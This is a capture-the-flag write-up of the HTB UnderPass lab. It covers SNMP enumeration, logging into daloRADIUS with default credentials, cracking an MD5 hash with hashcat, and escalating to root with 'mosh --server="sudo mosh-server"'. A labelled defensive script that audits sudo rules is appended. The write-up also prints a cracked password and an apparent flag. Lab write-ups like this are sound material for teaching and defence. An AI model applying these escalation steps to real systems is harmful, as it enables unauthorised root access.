The scan finds ports 22 and 80 open.

dirsearch turns up nothing useful.

Scanning the UDP ports with nmap shows port 161 open, running an SNMP v1/v2 service.

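  • -A collects detailed information about the target host, including operating system, service versions and script scan results.

  • -sV collects service version information.

  • -Pn skips host discovery and scans the target directly.

  • -sU scans the target host's UDP ports.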

Walking the service with snmpwalk reveals a key piece of information: daloradius.

A search turns up lirantal/daloradius: daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.

Searching for index.php turns up several routes, including daloradius/app/users/index.php.

That leads to a login page. Looking up the default credentials and trying them gets, annoyingly, a wrong username or password error.

Installing daloRADIUS · lirantal/daloradius Wiki

  • Username: administrator
  • Password: radius

There is another login page at /daloradius/app/operators/login.php

Login succeeds.

Browsing around, the most useful information is the Users page.

Crack the hash with hashcat (-m 0 is raw MD5, -a 0 is a wordlist attack):

echo 412DD4759978ACFCC81DEAB01B382403 > hash
hashcat -m 0 -a 0 hash /usr/share/wordlists/rockyou.txt

underwaterfriends

Try SSH.

As on the earlier Starting Point machines, run sudo -l to list the commands the current user may run through sudo: mosh-server is allowed.

mosh is a remote shell client that sets up its session over SSH; mosh-server is its server side.

svcMosh@underpass:~$ mosh-server -h
Usage: mosh-server new [-s] [-v] [-i LOCALADDR] [-p PORT[:PORT2]] [-c COLORS] [-l NAME=VALUE] [-- COMMAND...]
svcMosh@underpass:~$ mosh -h
Usage: /usr/bin/mosh [options] [--] [user@]host [command...]
        --client=PATH        mosh client on local machine
                                (default: "mosh-client")
        --server=COMMAND     mosh server on remote machine
                                (default: "mosh-server")

        --predict=adaptive      local echo for slower links [default]
-a      --predict=always        use local echo even on fast links
-n      --predict=never         never use local echo
        --predict=experimental  aggressively echo even when incorrect

-4      --family=inet        use IPv4 only
-6      --family=inet6       use IPv6 only
        --family=auto        autodetect network type for single-family hosts only
        --family=all         try all network types
        --family=prefer-inet use all network types, but try IPv4 first [default]
        --family=prefer-inet6 use all network types, but try IPv6 first
-p PORT[:PORT2]
        --port=PORT[:PORT2]  server-side UDP port or range
                                (No effect on server-side SSH port)
        --bind-server={ssh|any|IP}  ask the server to reply from an IP address
                                       (default: "ssh")

        --ssh=COMMAND        ssh command to run when setting up session
                                (example: "ssh -p 2222")
                                (default: "ssh")

        --no-ssh-pty         do not allocate a pseudo tty on ssh connection

        --no-init            do not send terminal initialization string

        --local              run mosh-server locally without using ssh

        --experimental-remote-ip=(local|remote|proxy)  select the method for
                             discovering the remote IP address to use for mosh
                             (default: "proxy")

        --help               this message
        --version            version and copyright information

Please report bugs to mosh-devel@mit.edu.
Mosh home page: https://mosh.org

--server=COMMAND specifies the command used to start the mosh server on the remote machine; the default is mosh-server.

mosh 127.0.0.1
mosh --server="mosh-server" 127.0.0.1
# The two commands above are equivalent

mosh-server can be run through sudo. If --server is set so that the remote server is started as sudo mosh-server, does that escalate to root?

mosh --server="sudo mosh-server" 127.0.0.1

9290acda8a407b44cc0ff956e1b2d870
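
Seen from the defender's side, the sudo rule that sudo -l revealed is the root cause, because mosh-server starts a shell or command as whoever runs it. The script below is an added example, not part of the original write-up: it audits sudo -l output and flags rules that reach root through a command-launching binary. The LAUNCHERS list, the function names and the sample rules are assumptions constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit `sudo -l` output for
# rules that let a user start a command-launching binary as root.

# Assumption: programs that can run a caller-chosen command. mosh-server comes
# from this page (its usage ends in "[-- COMMAND...]"); env, find and vim are
# other common cases. Extend for your environment.
LAUNCHERS="mosh-server env find vim"

# Reads `sudo -l` text on stdin; prints one line per rule worth a look.
audit_sudo_l() {
    awk -v launchers="$LAUNCHERS" '
    BEGIN { n = split(launchers, l, " "); for (i = 1; i <= n; i++) risky[l[i]] = 1 }
    # Rule lines look like: "    (root) NOPASSWD: /path/cmd args, /path/cmd2"
    /^[ \t]*\(/ {
        line = $0; sub(/^[ \t]*\(/, "", line)
        rp = index(line, ")")
        runas = substr(line, 1, rp - 1); rest = substr(line, rp + 1)
        if (runas !~ /ALL|root/) next            # only rules that reach root
        auth = (rest ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
        gsub(/[A-Z_]+:[ \t]*/, "", rest)         # drop tags such as NOPASSWD:
        m = split(rest, cmds, /,[ \t]*/)
        for (j = 1; j <= m; j++) {
            cmd = cmds[j]; sub(/^[ \t]+/, "", cmd); sub(/[ \t]+$/, "", cmd)
            k = split(cmd, w, /[ \t]+/)          # w[1] = path, rest = pinned args
            p = split(w[1], parts, "/"); base = parts[p]
            if (base in risky)
                printf "HIGH %s runas=%s %s launcher\n", w[1], runas, auth
            else if (k == 1)
                printf "REVIEW %s runas=%s %s any-args\n", w[1], runas, auth
        }
    }'
}

# Constructed sample: user and host names are from the page prompt, the rules
# and paths are made up for the demonstration.
sample_sudo_l() {
    cat <<'EOF'
User svcMosh may run the following commands on underpass:
    (ALL) NOPASSWD: /usr/bin/mosh-server
    (root) /usr/bin/systemctl restart freeradius, /usr/bin/tcpdump
EOF
}

sample_sudo_l | audit_sudo_l
```

A HIGH line means the rule should be removed or replaced with a fixed wrapper; a REVIEW line means the command accepts any arguments and needs a manual look.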